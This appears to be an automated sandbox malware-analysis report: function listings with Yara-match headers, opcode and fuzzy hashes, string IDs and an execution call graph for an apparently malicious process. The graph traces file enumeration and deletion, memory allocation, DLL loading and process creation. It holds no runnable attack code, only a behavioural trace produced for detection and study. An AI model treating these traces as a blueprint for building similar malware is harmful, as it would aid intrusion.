                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $e$k$o
                        • API String ID: 0-3624523832
                        • Opcode ID: 94587154aa337bd7dac90d3e38d7236459ccde362efd1b409f90d6e099ffbed8
                        • Instruction ID: 1c1f94d16fccf6f964d4b00477c375695e37d32e5a38d26ffb23c5b39d28366a
                        • Opcode Fuzzy Hash: 94587154aa337bd7dac90d3e38d7236459ccde362efd1b409f90d6e099ffbed8
                        • Instruction Fuzzy Hash: 03B1FDB5A00704AFDB65DBA4CD84FEFB7F9AF88740F108558F61AA7240D774AA41CB90
                        Function 02FE7B98 Relevance: 5.2, Strings: 4, Instructions: 232COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $e$h$o
                        • API String ID: 0-3662636641
                        • Opcode ID: e6563314f0200f35eded96bf32c59a8dff8ac42364b50ba5b69c5141134c50a8
                        • Instruction ID: 6096eb1bb8f0bdc134fa8c802627428c6ff281d1d354380cf4a6d783d9ee19c8
                        • Opcode Fuzzy Hash: e6563314f0200f35eded96bf32c59a8dff8ac42364b50ba5b69c5141134c50a8
                        • Instruction Fuzzy Hash: AA7144B29002187EDF65EB94CC44FEFB3BEAF45740F044199B64996150EE746B848FA2
                        Function 02FE7163 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                        • API String ID: 0-2877786613
                        • Opcode ID: a900fd3b665d41d9a6ba2edd6e38f09c7c26873688a5a88997b47cef50779f3c
                        • Instruction ID: 975988a0f1c82d10ff774135c71c5bad6e646fa35bb33f907ab8ebc66b5ec851
                        • Opcode Fuzzy Hash: a900fd3b665d41d9a6ba2edd6e38f09c7c26873688a5a88997b47cef50779f3c
                        • Instruction Fuzzy Hash: 5C31F7719111187AEB11EB948C52FEFF63ADF59740F04404DBB046A2A0E6B46B05CBF6
                        Function 02FE7BA3 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $e$h$o
                        • API String ID: 0-3662636641
                        • Opcode ID: 7cffe629e01c84e5b9586747cde72e1e9367a0f2a10a07673444e30c2faaad5f
                        • Instruction ID: 2dd0b1ba3cd1c72af4ef00492423830504a8b42cc7fe95e8f3b57ea139bd7464
                        • Opcode Fuzzy Hash: 7cffe629e01c84e5b9586747cde72e1e9367a0f2a10a07673444e30c2faaad5f
                        • Instruction Fuzzy Hash: E13153B1E002187EDF91EBA4CC44FEFB2BAAF45740F40419DA649A6150EB746B848F96

                        Execution Graph

                        Execution Coverage:2.6%
                        Dynamic/Decrypted Code Coverage:3.9%
                        Signature Coverage:1.4%
                        Total number of Nodes:485
                        Total number of Limit Nodes:77
                        execution_graph 96084 4196c0 96086 4196cf 96084->96086 96085 419710 96086->96085 96087 4196fd CreateThread 96086->96087 96088 42f000 96089 42f064 96088->96089 96117 426030 96089->96117 96091 42f194 96092 42f18d 96092->96091 96124 426140 96092->96124 96094 42f333 96095 42f210 96095->96094 96096 42f342 96095->96096 96128 42ede0 96095->96128 96097 4380b0 NtClose 96096->96097 96100 42f34c 96097->96100 96099 42f245 96099->96096 96101 42f250 96099->96101 96137 43a060 96101->96137 96103 42f279 96104 42f282 96103->96104 96105 42f298 96103->96105 96106 4380b0 NtClose 96104->96106 96140 42ecd0 CoInitialize 96105->96140 96108 42f28c 96106->96108 96109 42f2a6 96142 437bb0 96109->96142 96111 42f322 96146 4380b0 96111->96146 96113 42f32c 96149 439f80 96113->96149 96115 42f2c4 96115->96111 96116 437bb0 LdrInitializeThunk 96115->96116 96116->96115 96118 426063 96117->96118 96119 426087 96118->96119 96152 437c50 96118->96152 96119->96092 96121 4260aa 96121->96119 96122 4380b0 NtClose 96121->96122 96123 42612c 96122->96123 96123->96092 96125 426165 96124->96125 96157 437a50 96125->96157 96129 42edfc 96128->96129 96162 424510 96129->96162 96131 42ee23 96131->96099 96132 42ee1a 96132->96131 96133 424510 LdrLoadDll 96132->96133 96134 42eeee 96133->96134 96135 424510 LdrLoadDll 96134->96135 96136 42ef48 96134->96136 96135->96136 96136->96099 96166 4383c0 96137->96166 96139 43a07b 96139->96103 96141 42ed35 96140->96141 96141->96109 96143 437bca 96142->96143 96169 2c52ba0 LdrInitializeThunk 96143->96169 96144 437bfa 96144->96115 96147 4380cd 96146->96147 96148 4380de NtClose 96147->96148 96148->96113 96170 438410 96149->96170 96151 439f99 96151->96094 96153 437c6a 96152->96153 96156 2c52ca0 LdrInitializeThunk 96153->96156 96154 437c96 96154->96121 96156->96154 96158 437a6a 96157->96158 96161 2c52c60 LdrInitializeThunk 96158->96161 96159 4261d9 96159->96095 96161->96159 96163 424534 96162->96163 96164 424570 LdrLoadDll 96163->96164 96165 42453b 96163->96165 96164->96165 96165->96132 96167 4383da 96166->96167 96168 4383eb RtlAllocateHeap 96167->96168 96168->96139 96169->96144 96171 43842a 96170->96171 96172 43843b RtlFreeHeap 96171->96172 96172->96151 96173 4257c0 96178 427bf0 96173->96178 96175 4257f0 96177 42581c 96175->96177 96182 427b70 96175->96182 96179 427c03 96178->96179 96189 437660 96179->96189 96181 427c2e 96181->96175 96183 427bb4 96182->96183 96184 427bd5 96183->96184 96195 437460 96183->96195 96184->96175 96186 427bc5 96187 427be1 96186->96187 96188 4380b0 NtClose 96186->96188 96187->96175 96188->96184 96190 4376d0 96189->96190 96191 437681 96189->96191 96194 2c52dd0 LdrInitializeThunk 96190->96194 96191->96181 96192 4376f5 96192->96181 96194->96192 96196 4374d2 96195->96196 96197 437484 96195->96197 96200 2c54650 LdrInitializeThunk 96196->96200 96197->96186 96198 4374f7 96198->96186 96200->96198 96206 43b0c0 96207 439f80 RtlFreeHeap 96206->96207 96208 43b0d5 96207->96208 96209 437f40 96210 437f61 96209->96210 96211 437fd9 96209->96211 96212 437fef NtReadFile 96211->96212 96213 437700 96214 43771d 96213->96214 96217 2c52df0 LdrInitializeThunk 96214->96217 96215 437745 96217->96215 96223 42314c 96228 427870 96223->96228 96226 4380b0 NtClose 96227 423171 96226->96227 96229 42788a 96228->96229 96233 42315c 96228->96233 96234 4377f0 96229->96234 96232 4380b0 NtClose 96232->96233 96233->96226 96233->96227 96235 43780d 96234->96235 96238 2c535c0 LdrInitializeThunk 96235->96238 96236 42795a 96236->96232 96238->96236 96239 41b550 96240 41cbc1 96239->96240 96242 439ef0 96239->96242 96245 438200 96242->96245 96244 439f21 96244->96240 96246 43828a 96245->96246 96248 438224 96245->96248 96247 4382a0 NtAllocateVirtualMemory 96246->96247 96247->96244 96248->96244 96249 425850 96254 437750 96249->96254 96253 42589b 96255 43776d 96254->96255 96263 2c52c0a 96255->96263 96256 425886 96258 438140 96256->96258 96259 4381c4 96258->96259 96261 438164 96258->96261 96266 2c52e80 LdrInitializeThunk 96259->96266 96260 4381f5 96260->96253 96261->96253 96264 2c52c11 96263->96264 96265 2c52c1f LdrInitializeThunk 96263->96265 96264->96256 96265->96256 96266->96260 96267 420b50 96268 420b69 96267->96268 96269 424510 LdrLoadDll 96268->96269 96270 420b87 96269->96270 96271 420bd3 96270->96271 96272 420bc0 PostThreadMessageW 96270->96272 96272->96271 96273 42a790 96278 42a4c0 96273->96278 96275 42a79d 96293 42a160 96275->96293 96277 42a7b9 96279 42a4e5 96278->96279 96305 427e40 96279->96305 96282 42a622 96282->96275 96284 42a639 96284->96275 96285 42a630 96285->96284 96288 42a721 96285->96288 96327 4323d0 96285->96327 96331 429bc0 96285->96331 96290 42a779 96288->96290 96342 429f20 96288->96342 96291 439f80 RtlFreeHeap 96290->96291 96292 42a780 96291->96292 96292->96275 96294 42a176 96293->96294 96297 42a181 96293->96297 96295 43a060 RtlAllocateHeap 96294->96295 96294->96297 96295->96297 96296 42a197 96296->96277 96297->96296 96298 427e40 GetFileAttributesW 96297->96298 96299 42a48e 96297->96299 96302 4323d0 NtClose 96297->96302 96303 429bc0 2 API calls 96297->96303 96304 429f20 2 API calls 96297->96304 96298->96297 96300 42a4a7 96299->96300 96301 439f80 RtlFreeHeap 96299->96301 96300->96277 96301->96300 96302->96297 96303->96297 96304->96297 96306 427e61 96305->96306 96307 427e68 GetFileAttributesW 96306->96307 96308 427e73 96306->96308 96307->96308 96308->96282 96309 432530 96308->96309 96310 43253e 96309->96310 96311 432545 96309->96311 96310->96285 96312 424510 LdrLoadDll 96311->96312 96313 43257a 96312->96313 96314 432589 96313->96314 96348 432000 LdrLoadDll 96313->96348 96315 43a060 RtlAllocateHeap 96314->96315 96324 43274b 96314->96324 96317 4325a2 96315->96317 96318 4325b7 96317->96318 96319 43272a 96317->96319 96317->96324 96349 436390 NtClose 96318->96349 96320 432734 96319->96320 96325 4325ce 96319->96325 96350 436390 NtClose 96320->96350 96322 439f80 RtlFreeHeap 96322->96324 96324->96285 96325->96322 96326 432721 96325->96326 96326->96285 96328 4323e6 96327->96328 96330 4324e6 96327->96330 96328->96330 96351 4345c0 96328->96351 96330->96285 96332 429be6 96331->96332 96333 4345c0 NtClose 96332->96333 96334 429c42 96333->96334 96361 42d3f0 96334->96361 96336 429c4d 96338 429dd0 96336->96338 96339 429c6b 96336->96339 96337 429db5 96337->96285 96338->96337 96340 429a80 RtlFreeHeap 96338->96340 96339->96337 96371 429a80 96339->96371 96340->96338 96343 429f46 96342->96343 96344 4345c0 NtClose 96343->96344 96345 429fb7 96344->96345 96346 42d3f0 2 API calls 96345->96346 96347 429fc2 96346->96347 96347->96288 96348->96314 96349->96325 96350->96324 96352 43461d 96351->96352 96353 434654 96352->96353 96356 430f80 96352->96356 96353->96328 96355 434636 96355->96328 96357 430f26 96356->96357 96360 430f6b 96356->96360 96358 4380b0 NtClose 96357->96358 96359 430f2d 96358->96359 96359->96355 96360->96355 96362 4345c0 NtClose 96361->96362 96363 42d406 96362->96363 96364 42d413 96363->96364 96365 4345c0 NtClose 96363->96365 96364->96336 96366 42d424 96365->96366 96366->96364 96367 4345c0 NtClose 96366->96367 96368 42d43f 96367->96368 96369 439f80 RtlFreeHeap 96368->96369 96370 42d44c 96369->96370 96370->96336 96372 429a96 96371->96372 96375 42d460 96372->96375 96374 429b9c 96374->96339 96376 42d484 96375->96376 96377 42d51c 96376->96377 96378 439f80 RtlFreeHeap 96376->96378 96377->96374 96378->96377 96379 4350d0 96380 43512a 96379->96380 96382 435137 96380->96382 96383 432c50 96380->96383 96384 439ef0 NtAllocateVirtualMemory 96383->96384 96386 432c91 96384->96386 96385 432d96 96385->96382 96386->96385 96387 424510 LdrLoadDll 96386->96387 96389 432cd7 96387->96389 96388 432d10 Sleep 96388->96389 96389->96385 96389->96388 96390 2c52ad0 LdrInitializeThunk 96391 4227d8 96392 426030 2 API calls 96391->96392 96393 422803 96392->96393 96394 419720 96397 419b4f 96394->96397 96395 41a03d 96397->96395 96398 439c10 96397->96398 96399 439c36 96398->96399 96404 414080 96399->96404 96401 439c42 96402 439c70 96401->96402 96408 434710 96401->96408 96402->96395 96405 414083 96404->96405 96412 423250 96405->96412 96407 41408d 96407->96401 96409 43476a 96408->96409 96411 434777 96409->96411 96425 421710 96409->96425 96411->96402 96413 423267 96412->96413 96415 423280 96413->96415 96416 438af0 96413->96416 96415->96407 96417 438b08 96416->96417 96418 4345c0 NtClose 96417->96418 96420 438b23 96418->96420 96419 438b2c 96419->96415 96420->96419 96421 437750 LdrInitializeThunk 96420->96421 96422 438b81 96421->96422 96423 439f80 RtlFreeHeap 96422->96423 96424 438b9a 96423->96424 96424->96415 96426 421748 96425->96426 96449 427980 96426->96449 96428 421750 96429 43a060 RtlAllocateHeap 96428->96429 96448 421a15 96428->96448 96430 421766 96429->96430 96431 43a060 RtlAllocateHeap 96430->96431 96432 421777 96431->96432 96433 43a060 RtlAllocateHeap 96432->96433 96434 421788 96433->96434 96460 425b80 96434->96460 96436 421795 96437 4345c0 NtClose 96436->96437 96440 4217e9 96436->96440 96438 4217b2 96437->96438 96439 4345c0 NtClose 96438->96439 96441 4217c3 96439->96441 96444 42181b 96440->96444 96470 426790 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96440->96470 96441->96440 96443 4345c0 NtClose 96441->96443 96443->96440 96445 424510 LdrLoadDll 96444->96445 96446 4219d5 96445->96446 96466 436e30 96446->96466 96448->96411 96450 4279ac 96449->96450 96451 427870 2 API calls 96450->96451 96452 4279cf 96451->96452 96453 4279d9 96452->96453 96454 4279f1 96452->96454 96456 4380b0 NtClose 96453->96456 96457 4279e4 96453->96457 96455 427a0d 96454->96455 96458 4380b0 NtClose 96454->96458 96455->96428 96456->96457 96457->96428 96459 427a03 96458->96459 96459->96428 96461 425b96 96460->96461 96463 425ba0 96460->96463 96461->96436 96462 425c73 96462->96436 96463->96462 96464 4345c0 NtClose 96463->96464 96465 425cef 96464->96465 96465->96436 96467 436e8a 96466->96467 96469 436e97 96467->96469 96471 421a30 96467->96471 96469->96448 96470->96444 96474 421a50 96471->96474 96487 427c50 96471->96487 96473 421f35 96473->96469 96474->96473 96491 4308a0 96474->96491 96477 421c4e 96499 43b190 96477->96499 96479 421aab 96479->96473 96494 43b060 96479->96494 96480 427bf0 LdrInitializeThunk 96483 421c8e 96480->96483 96481 421c63 96481->96483 96505 4206d0 96481->96505 96483->96473 96483->96480 96484 4206d0 LdrInitializeThunk 96483->96484 96484->96483 96485 427bf0 LdrInitializeThunk 96486 421dbc 96485->96486 96486->96483 96486->96485 96488 427c5d 96487->96488 96489 427c85 96488->96489 96490 427c7e SetErrorMode 96488->96490 96489->96474 96490->96489 96492 439ef0 NtAllocateVirtualMemory 96491->96492 96493 4308c1 96492->96493 96493->96479 96495 43b070 96494->96495 96496 43b076 96494->96496 96495->96477 96497 43a060 RtlAllocateHeap 96496->96497 96498 43b09c 96497->96498 96498->96477 96500 43b100 96499->96500 96501 43a060 RtlAllocateHeap 96500->96501 96504 43b15d 96500->96504 96502 43b13a 96501->96502 96503 439f80 RtlFreeHeap 96502->96503 96503->96504 96504->96481 96508 438320 96505->96508 96509 43833a 96508->96509 96512 2c52c70 LdrInitializeThunk 96509->96512 96510 4206f2 96510->96486 96512->96510 96513 42f8e0 96514 42f8fd 96513->96514 96515 424510 LdrLoadDll 96514->96515 96516 42f91b 96515->96516 96517 426ae0 96518 426b0a 96517->96518 96521 427a20 96518->96521 96520 426b34 96522 427a3d 96521->96522 96528 437840 96522->96528 96524 427a8d 96525 427a94 96524->96525 96533 437910 96524->96533 96525->96520 96527 427abd 96527->96520 96529 4378cd 96528->96529 96530 437861 96528->96530 96538 2c52f30 LdrInitializeThunk 96529->96538 96530->96524 96531 437906 96531->96524 96534 4379b2 96533->96534 96535 437934 96533->96535 96539 2c52d10 LdrInitializeThunk 96534->96539 96535->96527 96536 4379f7 96536->96527 96538->96531 96539->96536 96540 42bf20 96542 42bf49 96540->96542 96541 42c04d 96542->96541 96543 42bff3 FindFirstFileW 96542->96543 96543->96541 96544 42c00e 96543->96544 96545 42c034 FindNextFileW 96544->96545 96548 42be30 NtClose 96544->96548 96545->96544 96547 42c046 FindClose 96545->96547 96547->96541 96548->96544 96549 438020 96550 438089 96549->96550 96552 438041 96549->96552 96551 43809f NtDeleteFile 96550->96551 96553 430ee0 96554 430efc 96553->96554 96555 430f24 96554->96555 96556 430f38 96554->96556 96559 4380b0 NtClose 96555->96559 96557 4380b0 NtClose 96556->96557 96558 430f41 96557->96558 96563 43a0a0 RtlAllocateHeap 96558->96563 96561 430f2d 96559->96561 96562 430f4c 96563->96562 96569 4282a1 96570 428292 96569->96570 96571 4282a6 96569->96571 96572 4345c0 NtClose 96571->96572 96573 4282de 96572->96573 96573->96570 96575 426d00 NtClose LdrInitializeThunk LdrInitializeThunk 96573->96575 96575->96570 96576 437de0 96577 437e89 96576->96577 96579 437e05 96576->96579 96578 437e9f NtCreateFile 96577->96578 96580 4375a0 96581 437621 96580->96581 96582 4375c1 96580->96582 96585 2c52ee0 LdrInitializeThunk 96581->96585 96583 437652 96585->96583 96588 4296ab 96589 4296ba 96588->96589 96590 4296c1 96589->96590 96591 439f80 RtlFreeHeap 96589->96591 96591->96590 96592 427070 96593 427088 96592->96593 96597 4270e2 96592->96597 96593->96597 96598 42aa00 96593->96598 96595 4270cc 96595->96597 96604 42ac90 96595->96604 96599 42aa25 96598->96599 96600 4345c0 NtClose 96599->96600 96602 42ab92 96600->96602 96601 42ac51 96601->96595 96602->96601 96603 4345c0 NtClose 96602->96603 96603->96601 96605 42acb6 96604->96605 96606 42aecc 96605->96606 96631 4384a0 96605->96631 96606->96597 96608 42ad2c 96608->96606 96609 43b190 2 API calls 96608->96609 96610 42ad45 96609->96610 96610->96606 96611 42ae13 96610->96611 96612 437750 LdrInitializeThunk 96610->96612 96614 425740 LdrInitializeThunk 96611->96614 96615 42ae32 96611->96615 96613 42ada1 96612->96613 96613->96611 96616 42adaa 96613->96616 96614->96615 96630 42aeb4 96615->96630 96637 437320 96615->96637 96616->96606 96623 42addc 96616->96623 96625 42adfb 96616->96625 96634 425740 96616->96634 96617 427bf0 LdrInitializeThunk 96621 42ae09 96617->96621 96621->96597 96622 427bf0 LdrInitializeThunk 96626 42aec2 96622->96626 96652 433910 LdrInitializeThunk 96623->96652 96624 42ae8b 96642 4373c0 96624->96642 96625->96617 96626->96597 96628 42aea5 96647 437500 96628->96647 96630->96622 96632 4384ba 96631->96632 96633 4384cb CreateProcessInternalW 96632->96633 96633->96608 96635 437910 LdrInitializeThunk 96634->96635 96636 42577e 96635->96636 96636->96623 96638 437341 96637->96638 96639 43738f 96637->96639 96638->96624 96653 2c539b0 LdrInitializeThunk 96639->96653 96640 4373b4 96640->96624 96643 437432 96642->96643 96645 4373e4 96642->96645 96654 2c54340 LdrInitializeThunk 96643->96654 96644 437457 96644->96628 96645->96628 96648 437524 96647->96648 96649 437572 96647->96649 96648->96630 96655 2c52fb0 LdrInitializeThunk 96649->96655 96650 437597 96650->96630 96652->96625 96653->96640 96654->96644 96655->96650 96656 426eb0 96657 426ecc 96656->96657 96660 426f1f 96656->96660 96659 4380b0 NtClose 96657->96659 96657->96660 96658 427042 96661 4345c0 NtClose 96658->96661 96663 42705c 96658->96663 96662 426ee7 96659->96662 96660->96658 96669 4262c0 NtClose LdrInitializeThunk LdrInitializeThunk 96660->96669 96661->96663 96668 4262c0 NtClose LdrInitializeThunk LdrInitializeThunk 96662->96668 96665 42701f 96665->96658 96670 426490 NtClose LdrInitializeThunk LdrInitializeThunk 96665->96670 96668->96660 96669->96665 96670->96658 96671 431270 96672 43127f 96671->96672 96673 4345c0 NtClose 96672->96673 96678 431298 96673->96678 96674 431306 96675 4312c3 96676 439f80 RtlFreeHeap 96675->96676 96677 4312d3 96676->96677 96678->96674 96678->96675 96679 431301 96678->96679 96680 439f80 RtlFreeHeap 96679->96680 96680->96674

                        Executed Functions

                        Function 00419720 Relevance: 40.5, Strings: 32, Instructions: 479COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 26 419720-419b4d 27 419b5e-419b6a 26->27 28 419b80-419b8a 27->28 29 419b6c-419b7e 27->29 31 419b9b-419ba7 28->31 29->27 32 419ba9-419bb8 31->32 33 419bba-419bc6 31->33 32->31 35 419bc8-419be9 33->35 36 419beb-419bfc 33->36 35->33 37 419c0d-419c19 36->37 38 419c1b-419c2b 37->38 39 419c3e 37->39 40 419c2d-419c36 38->40 41 419c3c 38->41 42 419c48-419c4c 39->42 40->41 41->37 44 419c75-419c7e 42->44 45 419c4e-419c73 42->45 46 419c80-419c92 44->46 47 419c94-419c9b 44->47 45->42 46->44 48 419cd6-419ce0 47->48 49 419c9d-419cb1 47->49 52 419cf1-419cfb 48->52 50 419cb3-419cb7 49->50 51 419cb8-419cd4 49->51 50->51 51->47 53 419d35-419d3f 52->53 54 419cfd-419d33 52->54 55 419d50-419d5c 53->55 54->52 57 419d6f-419d79 55->57 58 419d5e-419d6d 55->58 59 419d8a-419d93 57->59 58->55 61 419db1-419dc5 59->61 62 419d95-419da1 59->62 63 419dcb-419dd4 61->63 64 419da3-419da9 62->64 65 419daf 62->65 67 419ff1-419ff8 63->67 68 419dda-419de4 63->68 64->65 65->59 70 41a0b9-41a0c3 67->70 71 419ffe-41a008 67->71 69 419df5-419e01 68->69 73 419e03-419e12 69->73 74 419e14-419e1b 69->74 72 41a0d4-41a0dd 70->72 75 41a019-41a022 71->75 76 41a0df-41a0ec 72->76 77 41a0ee-41a0f2 72->77 73->69 78 419e40-419e47 74->78 79 419e1d-419e33 74->79 81 41a024-41a036 75->81 82 41a038 call 439c10 75->82 76->72 83 41a115-41a11f 77->83 84 41a0f4-41a113 77->84 88 419e69-419e85 78->88 89 419e49-419e67 78->89 86 419e35-419e3b 79->86 87 419e3e 79->87 91 41a00a-41a013 81->91 93 41a03d-41a047 82->93 84->77 86->87 87->74 92 419e96-419e9f 88->92 89->78 91->75 95 419ea1-419ead 92->95 96 419ebd-419ec7 92->96 94 41a058-41a064 93->94 101 41a066-41a079 94->101 102 41a07b-41a082 94->102 97 419ebb 95->97 98 419eaf-419eb5 95->98 99 419ec9-419ee8 96->99 100 419efb-419f19 96->100 97->92 98->97 106 419ef9 99->106 107 419eea-419ef3 99->107 108 419f65-419f69 100->108 109 419f1b-419f25 100->109 101->94 102->70 103 41a084-41a0b7 102->103 103->102 106->96 107->106 111 419f92-419f98 108->111 112 419f6b-419f90 108->112 110 419f36-419f42 109->110 114 419f60 110->114 115 419f44-419f50 110->115 113 419f9c-419fac 111->113 112->108 113->113 116 419fae-419fb5 113->116 114->67 117 419f52-419f58 115->117 118 419f5e 115->118 119 419fb7-419fea 116->119 120 419fec 116->120 117->118 118->110 119->116 120->63
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "$%$+$,%$/$0>$2$2Z$;#$< $< $<R$=*$Ae$B:$G3$H$IU$O`$RU$X$Y$_$b%$o$q$u$~l$+$0$9$u
                        • API String ID: 0-4099191530
                        • Opcode ID: f0d97bfc266cb89a751195f7d6ba12e1b092f89b0ccfdd4a23288be59f5d3020
                        • Instruction ID: f1df3ba154505804c03b36b0b87c082b1e6ce042acafe597358df1aead254072
                        • Opcode Fuzzy Hash: f0d97bfc266cb89a751195f7d6ba12e1b092f89b0ccfdd4a23288be59f5d3020
                        • Instruction Fuzzy Hash: C842A0B0D06229CBEB24CF45C9947EDBBB2BB45308F1081DAD4496B280D7B96EC9DF45
                        Function 0042BF20 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 587 42bf20-42bfd3 call 43a020 * 2 call 411410 call 431370 call 411410 call 431370 call 411410 call 431370 604 42bfd5-42bfd7 587->604 605 42c04d-42c055 587->605 604->605 606 42bfd9-42bfdd 604->606 606->605 607 42bfdf-42bfe1 606->607 607->605 608 42bfe3-42c00c call 42bd90 FindFirstFileW 607->608 608->605 611 42c00e 608->611 612 42c011-42c018 611->612 613 42c034-42c044 FindNextFileW 612->613 614 42c01a-42c031 call 42be30 612->614 613->612 616 42c046-42c04a FindClose 613->616 614->613 616->605
                        APIs
                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 0042C004
                        • FindNextFileW.KERNELBASE(?,00000010), ref: 0042C03F
                        • FindClose.KERNELBASE(?), ref: 0042C04A
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: e994ebea3dcc68c53da288b019f70c33a8c52c99dce6311839e235961a6aff96
                        • Instruction ID: 247b63ba7913556bada7e59bd3aa24f670d072f8bf6102c5322e2e7c08c679d8
                        • Opcode Fuzzy Hash: e994ebea3dcc68c53da288b019f70c33a8c52c99dce6311839e235961a6aff96
                        • Instruction Fuzzy Hash: 8231A571A00318BBEB20DFA5DC85FFF777C9B44708F54445DB908A7181DA78AE848BA4
                        Function 00437DE0 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00437ED0
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: c9ff7e9c102486d3567e1a3ae7d2916bd5240a67c669c1ec41142ee4c605987f
                        • Instruction ID: adb07245180dc1b098bcf6243279636df4e4215ef6cd7ced0692e758907be39a
                        • Opcode Fuzzy Hash: c9ff7e9c102486d3567e1a3ae7d2916bd5240a67c669c1ec41142ee4c605987f
                        • Instruction Fuzzy Hash: B831F2B5A00209AFCB14DF99D881EDEB7F9EF8C304F10821AF919A3340D734A851CBA4
                        Function 00437F40 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00438018
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 7b97b7200c014d16e772c4eeea5afa19c938df1b217401ec50f4c5ca143c3311
                        • Instruction ID: 7dd67ec92753483d8ae31a4d9adae83c448ae50412d037f6446b827265eba99a
                        • Opcode Fuzzy Hash: 7b97b7200c014d16e772c4eeea5afa19c938df1b217401ec50f4c5ca143c3311
                        • Instruction Fuzzy Hash: 8E31E8B5A00209AFDB14DF99D881EEFB7B9EF8C314F11810EF919A7340D674A8518BA5
                        Function 00438200 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00421AAB,?,00436E97,00000000,00000004,00003000,?,?,?,?,?,00436E97,00421AAB,00421AAB,00000000,?), ref: 004382BD
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: 9c156b13dc7385ad9f595c4b33052ab10ff97d24bc30979311ca6841c05a136b
                        • Instruction ID: 1e211a3d9ad5bc5236c6bdd5873a3d076a346dcad88513f0cadc27eddf66ea79
                        • Opcode Fuzzy Hash: 9c156b13dc7385ad9f595c4b33052ab10ff97d24bc30979311ca6841c05a136b
                        • Instruction Fuzzy Hash: A02127B1A00209ABDB14DF99DC81FABB7B9EF88704F10810EFD19A7340D674A8518BA5
                        Function 00438020 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_410000_setx.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteFile
                        • String ID:
                        • API String ID: 4033686569-0
                        • Opcode ID: 3be2dc535e3fb99acdb798e7d55ab67b82f9b61835c56effe6230f2ff84682c9
                        • Instruction ID: 8bb6792db8b4c84cbd5239693ce50071cb63a80c63cf58c8d41ab76859fd73b0
                        • Opcode Fuzzy Hash: 3be2dc535e3fb99acdb798e7d55ab67b82f9b61835c56effe6230f2ff84682c9
